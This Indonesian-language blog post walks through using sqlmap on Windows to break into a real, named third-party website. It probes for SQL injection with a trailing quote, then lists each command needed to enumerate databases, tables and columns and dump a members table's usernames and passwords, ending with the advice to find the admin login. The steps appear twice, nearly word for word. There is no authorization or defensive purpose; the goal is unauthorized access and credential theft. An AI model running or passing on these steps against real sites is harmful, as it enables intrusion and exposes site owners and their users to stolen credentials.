Pasid Software - Tuturial sqlamp secara lengkap di windows, bagi sobat yang menemukan bug pada website dan ingin scan database website itu anda bisa menggunakan tools SQLMAP di windows
Phyton : download disini
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
![[Image: 1.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjgcFAsVgcRVSLdULhLtK_dnH4CvA0R4nu-5ljKSjio4USLvSOImuYrK0vNm0mEwOVqhPP_4aZ43A0BqPwl70wSuGwsdW5XRSap0qNc8CWbhzyesSobKSThbCg4dtI65DNuT6HhTlI2QuZ/s400/1.PNG)
4. disini saya sudah mendapatkan web yang vuln http://www.pushingpetals.com/buy.php?id=55
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmap sehingga tampak seperti gambar berikut ini
![[Image: 2.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOJYKkWVn6UcpMFZeEAOyxJpUSTRI8Bgo0m4ROwCTZo0dcC4MzzNM2doOE4uIHKm4n0-9uUzfO49vpCbn6Q6MvYceW8ePL-WazG2EUzlnsY7p2eFiNqx2EE-fKvgULhE-X5m5Qqzm-N5Qo/s640/2.PNG)
7. langsung aja ketik perintah berikut sqlmap.py -u URL Target --dbs
Contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbs lalu Tekan Enter
![[Image: 3.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyE5XDwGJM9YuAuQ4sxwYOcL_gvX-6R-DYi5ElsM4dQuFOBk_4mo_a4BxYUKldvc2N9iRgJqEYAA_QRkFGckHjU35xd01Q6K08SHoeZPMhRF1UlmxICCDPXdVIJ1xwlUSbxIL4B6X4QNuw/s1600/3.PNG)
8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah sqlmap.py -u Url Target - D nama database --tables
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables
Maka hasil nya akan seperti ini
![[Image: 4.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-WwcLxnKhTz1xqXEjN7RmM9rbTF8Cs6izR0hcuNn2Xk7i5S3DhSmsjXOprjzFu1SLNHXes3Djlnenxm9WPkWrncDF9TZ8vyJ2Rtn-lWYzlP9TM_XTkcZMwlQEVi3HUDM5b3d2cpbeXw-r/s1600/4.PNG)
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table Members aja
dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini
![[Image: 5.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFlR0VIYgb-pQu-7DoNn3SKOyDIQfVGrLmmSM94ey2T1lAMG1LCgRb-YmGrA_Ylvfy_1V-_pRCa0ksvjPs81ykLhgIbRY6VCqcFds00PFkKEiRV3tTp4283_77Zq3Ef1J3IlBQKZSmdETP/s1600/5.PNG)
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut
![[Image: 6.PNG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT9E_upLKnngv0sz72bQrWywhmLkqmhB_1N3x917YxPGYBjzmK592BI9WXmUWAsymw8tn1lcmoX_RJEmC1MEKIvRcTtE1AsbH77U4rQ7dVt0h08se8eNTojFmHVQLtS8jar5ZC2J46Yfhh/s1600/6.PNG)
tinggal kita cari login admin nya
sekian dlo tutor dari ane mudah"an bermanfaat y Gan
Phyton : download disini
Sqlmap : download disini
setelah semua bahan sudah terkumpulkan sekarang kita langsung mencari web/ target yg Vuln
1. Install dlo Phyton nya
2. Extrack sqlmap nya dan copy file nya ke Drive C:
3. Untuk mengetahui Website tersebut Vuln Sqli kita tambahkan tanda ( ' ) di akhir Url
Jika website tersebut Vuln maka akan muncul seperti gambar berikut ini
Spoiler :
5. ok langsung saja kita buka sqlmap nya buka Cmd atau tekan Windows + R
6. Ketik pada CMD dengan Perintah cd/ lalu ketik lagi perintah cd/sqlmap sehingga tampak seperti gambar berikut ini
Spoiler :
Contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 --dbs lalu Tekan Enter
Spoiler :
8. tuh keliatan kan Database nya , sekarang kita coba untuk scan data base nya
dengan perintah sqlmap.py -u Url Target - D nama database --tables
contoh : sqlmap.py -u
http://www.pushingpetals.com/buy.php?id=55 -D db410405659 --tables
Maka hasil nya akan seperti ini
Spoiler :
9. Keliatan kan isi table Database nya , sekarang kita coba scan table tersebut ( cari menurut kalian di table mana terdapat user name dan password admin web nya )
ane coba scan table Members aja
dengan perinta sqlmap.py -u Url Target - D nama_database -T nama_table --columns
contoh : sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members --columns
lalu tekan enter dan hasil nya seperti ini
Spoiler :
10. Nah keliatan tuh table username dan password , untuk melihat isi table nya kita ketik perintah sqlmap.py -u Url Target -D nama_database -T Nama_table -C nama_kolom --dump
contoh :
sqlmap.py -u http://www.pushingpetals.com/buy.php?id=55 -D db410405659 -T members -C username,password --dump
lalu tekan enter ,
11. setelah kita tekan enter makan akan muncul username dan password nya seperti gambar berikut
Spoiler :
tinggal kita cari login admin nya
sekian dlo tutor dari ane mudah"an bermanfaat y Gan
0 komentar:
Posting Komentar